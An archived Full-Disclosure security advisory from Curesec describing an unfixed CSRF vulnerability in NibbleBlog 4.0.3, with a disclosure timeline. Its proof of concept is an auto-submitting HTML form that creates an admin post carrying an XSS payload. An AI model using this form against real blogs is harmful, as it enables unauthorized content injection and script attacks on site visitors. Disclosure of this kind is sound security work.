lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <55E58DC4.90506@curesec.com> Date: Tue, 1 Sep 2015 13:36:36 +0200 From: "Curesec Research Team (CRT)" <crt@...esec.com> To: fulldisclosure@...lists.org Subject: [FD] NibbleBlog 4.0.3 - CSRF - Not fixed NibbleBlog 4.0.3: CSRF Security Advisory – Curesec Research Team 1. Introduction Affected Product: NibbleBlog 4.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: Website: http://www.nibbleblog.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 07/21/2015 Disclosed to public: 09/01/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description NibbleBlog 4.0.3 does not have CSRF protection. This means that an attacker can perform actions for an admin if the admin is logged in and visits an attacker controlled website. In the case of NibbleBlog, this can for example lead to persistent XSS via the creation of a new post, which in turn allows for phishing attacks or the injection of JavaScript keyloggers. 3. Proof of Concept Create new Post (for Spam and XSS): <form id="myForm" action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple" method="POST"> <input name="title" value="Interesting!"> <input name="content" value="visit <a href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>"> <input name="allow_comments" value="1"> <input name="id_cat" value="0"> </form> <script> document.getElementById("myForm").submit(); </script> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 07/21/2015 Informed Vendor about Issue 07/22/2015 Vendor Replied 08/18/2015 Reminded Vendor of release date (no reply) 09/01/2015 Disclosed to public 6. Blog Reference http://blog.curesec.com/article/blog/NibbleBlog-403-CSRF-46.html _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists